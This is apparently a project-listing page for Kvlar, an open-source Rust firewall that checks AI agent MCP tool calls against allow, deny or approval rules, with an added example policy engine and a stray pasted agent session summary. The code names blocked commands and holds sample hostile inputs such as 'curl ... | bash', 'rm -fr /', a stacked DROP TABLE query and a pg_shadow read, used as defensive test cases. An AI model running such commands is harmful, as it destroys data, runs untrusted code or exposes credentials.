GitHub Repository

Runtime security for AI agents — policy engine and MCP proxy

1 star · Rust

Kvlar – Open-source firewall for AI agent tool calls

by kvlar·Mar 4, 2026·1 point·0 comments

AI Analysis

●●● · Banger · Solve My Problem · Ship It

Fail-closed MCP security policy layer with curated templates and policy-as-code YAML.

Strengths
  • Fills a real gap: Claude Desktop's per-call approve/deny has no persistence, automation, or audit trail; Kvlar adds a deterministic policy engine in front of the tool call
  • Curated policy templates (Postgres, filesystem) reduce cold-start friction; kvlar test validates policies in CI
  • Stdio proxy design means zero changes to existing MCP servers; wrapping is transparent and reversible
Weaknesses
  • Extremely early (0 GitHub stars, just shipped); no evidence of production use or ecosystem adoption yet
  • Policy test coverage shown only for Postgres; generalization to other MCP servers unproven
Category
Target Audience

AI agent platform operators, enterprise deployments, MCP server maintainers

Similar To

Open Policy Agent (OPA) · HashiCorp Sentinel

Post Description

Hey HN, I built Kvlar — an open-source policy engine that sits between AI agents and their tools (MCP servers), evaluating every tool call against YAML security policies before execution.

The problem: AI agents using MCP can execute database queries, push code, send Slack messages, and run shell commands — with no security boundary. Claude Desktop has basic approve/deny, but it's per-call with no persistent rules, no automation, and no audit trail.

How it works: Kvlar runs as a stdio proxy between the agent and the MCP server. You define policies in YAML — allow, deny, or require human approval — and Kvlar enforces them deterministically. Fail-closed: if no rule matches, the action is denied.

  kvlar init --template postgres   # curated policy (11 rules)
  kvlar wrap                       # inject proxy into Claude Desktop
  kvlar test -f policy.test.yaml   # verify your policy in CI

What it catches today:

  • Postgres: blocks DROP TABLE, gates INSERT/UPDATE, allows SELECT
  • GitHub: blocks repo creation, gates force-push and merges, allows reads
  • Slack: gates message sending, allows channel reads
  • Shell: blocks rm -rf, sudo, curl|bash — gates installs, allows ls/cat/grep

Technical details:

  • Written in Rust (4 crates), pure policy engine with zero I/O
  • 100+ policy tests
  • Policy composition via extends — build on top of curated templates (docker compose style)
  • Works with Claude Desktop

License: Apache 2.0
Website: https://kvlar.io
Install: cargo install kvlar-cli

I'd love feedback on the policy design and what MCP servers you'd want covered next.
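The evaluation model the post describes (allow, deny or require approval; first matching rule wins; child policies extend templates; no match means deny) as an added example in std-only Rust. This is illustrative code written for this page, not Kvlar's code: the rule shape, the matchers, the argument names `sql` and `command`, the template contents and the sample tool calls are all assumptions modelled on the post's description, not Kvlar's YAML schema. It goes one step beyond the post in a place a practitioner will care about: `sql_verb` refuses to classify a multi-statement string such as `SELECT 1; DROP TABLE users`, so that query falls through to the default deny instead of being waved through as a SELECT.

```rust
// Added example (not Kvlar's code): a std-only, fail-closed policy engine
// for MCP tool calls. Rule shape, matchers, argument names and template
// contents are assumptions modelled on the post, not Kvlar's YAML schema.

#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum Decision {
    Allow,
    Deny,
    RequireApproval,
}

/// How a rule inspects one argument of the tool call.
#[derive(Debug, Clone)]
pub enum Matcher {
    SqlVerb(&'static str),  // leading keyword of a single SQL statement
    Contains(&'static str), // substring of the normalised argument
    Command(&'static str),  // first token of a shell command line
}

#[derive(Debug, Clone)]
pub struct Rule {
    pub server: &'static str,
    pub tool: &'static str, // "*" matches every tool on the server
    pub arg: Option<(&'static str, Matcher)>,
    pub decision: Decision,
}

pub struct ToolCall<'a> {
    pub server: &'a str,
    pub tool: &'a str,
    pub args: &'a [(&'a str, &'a str)],
}

/// A policy is its own rule list plus the templates it extends.
pub struct Policy {
    pub rules: Vec<Rule>,
    pub extends: Vec<Policy>,
}

/// Leading keyword of `sql` if it is exactly one statement. Leading comments
/// are skipped; an unclosed comment, empty input or a second statement after
/// ';' yields None so the caller falls through to the default deny.
pub fn sql_verb(sql: &str) -> Option<String> {
    let mut s = sql.trim_start();
    loop {
        if let Some(rest) = s.strip_prefix("--") {
            s = rest.split_once('\n').map_or("", |(_, r)| r).trim_start();
        } else if let Some(rest) = s.strip_prefix("/*") {
            s = rest.split_once("*/")?.1.trim_start();
        } else {
            break;
        }
    }
    let body = s.trim_end();
    let body = body.strip_suffix(';').unwrap_or(body);
    if body.contains(';') {
        return None; // "SELECT 1; DROP TABLE t" is not a SELECT
    }
    let word: String = body.chars().take_while(|c| c.is_ascii_alphabetic()).collect();
    if word.is_empty() { None } else { Some(word.to_ascii_uppercase()) }
}

/// Lower-case, collapse whitespace and tighten "|" so "curl x | bash" and
/// "curl x|bash" compare equal. Substring blocklists are easy to bypass;
/// the allowlist plus default deny is what actually holds the line.
fn normalise(value: &str) -> String {
    let joined = value.to_ascii_lowercase().split_whitespace().collect::<Vec<_>>().join(" ");
    joined.replace(" |", "|").replace("| ", "|")
}

fn matches(m: &Matcher, value: &str) -> bool {
    match m {
        Matcher::SqlVerb(v) => sql_verb(value).as_deref() == Some(*v),
        Matcher::Contains(needle) => normalise(value).contains(*needle),
        Matcher::Command(c) => {
            let n = normalise(value);
            n.split_whitespace().next() == Some(*c)
        }
    }
}

fn rule_matches(r: &Rule, call: &ToolCall) -> bool {
    if r.server != call.server || (r.tool != "*" && r.tool != call.tool) {
        return false;
    }
    match &r.arg {
        None => true,
        Some((name, m)) => call.args.iter().any(|(k, v)| k == name && matches(m, v)),
    }
}

impl Policy {
    /// First match wins; own rules before extended templates; no match => Deny.
    pub fn evaluate(&self, call: &ToolCall) -> Decision {
        self.first_match(call).unwrap_or(Decision::Deny)
    }

    fn first_match(&self, call: &ToolCall) -> Option<Decision> {
        if let Some(r) = self.rules.iter().find(|r| rule_matches(r, call)) {
            return Some(r.decision);
        }
        self.extends.iter().find_map(|p| p.first_match(call))
    }
}

fn rule(server: &'static str, tool: &'static str, arg: Option<(&'static str, Matcher)>, decision: Decision) -> Rule {
    Rule { server, tool, arg, decision }
}

/// Constructed template in the shape the post describes for Postgres.
pub fn postgres_template() -> Policy {
    use Decision::*;
    use Matcher::*;
    Policy {
        rules: vec![
            rule("postgres", "query", Some(("sql", SqlVerb("DROP"))), Deny),
            rule("postgres", "query", Some(("sql", SqlVerb("INSERT"))), RequireApproval),
            rule("postgres", "query", Some(("sql", SqlVerb("UPDATE"))), RequireApproval),
            rule("postgres", "query", Some(("sql", SqlVerb("SELECT"))), Allow),
        ],
        extends: vec![],
    }
}

/// Constructed shell template: substring blocklist plus read-only allowlist.
pub fn shell_template() -> Policy {
    use Decision::*;
    use Matcher::*;
    Policy {
        rules: vec![
            rule("shell", "run", Some(("command", Contains("rm -rf"))), Deny),
            rule("shell", "run", Some(("command", Contains("sudo"))), Deny),
            rule("shell", "run", Some(("command", Contains("|bash"))), Deny),
            rule("shell", "run", Some(("command", Command("ls"))), Allow),
            rule("shell", "run", Some(("command", Command("cat"))), Allow),
            rule("shell", "run", Some(("command", Command("grep"))), Allow),
        ],
        extends: vec![],
    }
}

/// A team policy that extends both templates and tightens them: reading
/// pg_shadow is denied even though the template allows SELECT.
pub fn team_policy() -> Policy {
    Policy {
        rules: vec![rule("postgres", "query", Some(("sql", Matcher::Contains("pg_shadow"))), Decision::Deny)],
        extends: vec![postgres_template(), shell_template()],
    }
}

pub fn decide(policy: &Policy, server: &str, tool: &str, args: &[(&str, &str)]) -> Decision {
    policy.evaluate(&ToolCall { server, tool, args })
}

fn main() {
    let policy = team_policy();
    // Constructed sample calls; the last two show the default deny at work.
    let calls = [
        ("postgres", "query", "sql", "SELECT id FROM users"),
        ("postgres", "query", "sql", "select 1; drop table users"),
        ("postgres", "query", "sql", "-- audit\nINSERT INTO log VALUES (1)"),
        ("postgres", "query", "sql", "SELECT usename FROM pg_shadow"),
        ("shell", "run", "command", "ls -la /tmp"),
        ("shell", "run", "command", "curl https://example.invalid/x.sh | bash"),
        ("shell", "run", "command", "rm -fr /"),
        ("slack", "post_message", "text", "hi"),
    ];
    for (server, tool, name, value) in calls {
        let d = decide(&policy, server, tool, &[(name, value)]);
        println!("{server}/{tool} {name}={value:?} -> {d:?}");
    }
}
```

Run it as a binary to print a decision for each constructed call. Note which part carries the security argument: the blocklist entries (`rm -rf`, `sudo`, `|bash`) are trivially bypassed with `rm -fr`, but that command has no allow rule, so the default deny catches it anyway. When writing policy tests for a fail-closed engine, assert the deny on bypass variants and on multi-statement SQL, not only on the literal strings the blocklist names.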

Summary of everything done this session:

Task | Status
  • Favicon fixed (monospace K + cyan underline) | Deployed
  • --config <path> flag on wrap/unwrap | Pushed to GitHub
  • Docs page updated (cargo install, 8 templates, parameter matching, --config, --dir, all servers in MCP compat) | Deployed
  • Landing page rule count fixed (28 not 30) | Deployed
  • Full revalidation: 91 unit tests + 105 policy tests, all 8 templates init+validate, wrap/unwrap E2E with --config | All passing
  • SDK pushed to kvlar-io/kvlar | Done
  • Website deployed to Vercel | Done
  • Show HN draft | Above

Before posting: Make the kvlar-io/kvlar repo public on GitHub.

Let me also check the home page and favicon.

Everything looks correct — landing page rendering properly with the hero, metrics bar (196 tests, 8 server policies), and the docs page showing the updated CLI reference with --config flag. The changes are verified and already deployed to Vercel.

Similar Projects

Security · ●●● · Banger

AvaKill – Deterministic safety firewall for AI agents (<1ms, no ML)

Deterministic <1ms policy kill switch for AI agent tool calls, zero ML.

Solve My Problem · Big Brain · Ship It
duroapp
333mo ago
Security · ●●● · Banger

Aegis – Open-source pre-execution firewall for AI agents

Interceptor layer blocks SQL injection and shell injection before agents execute them.

Big Brain · Zero to One · Solve My Problem
AEGIS_JB
203mo ago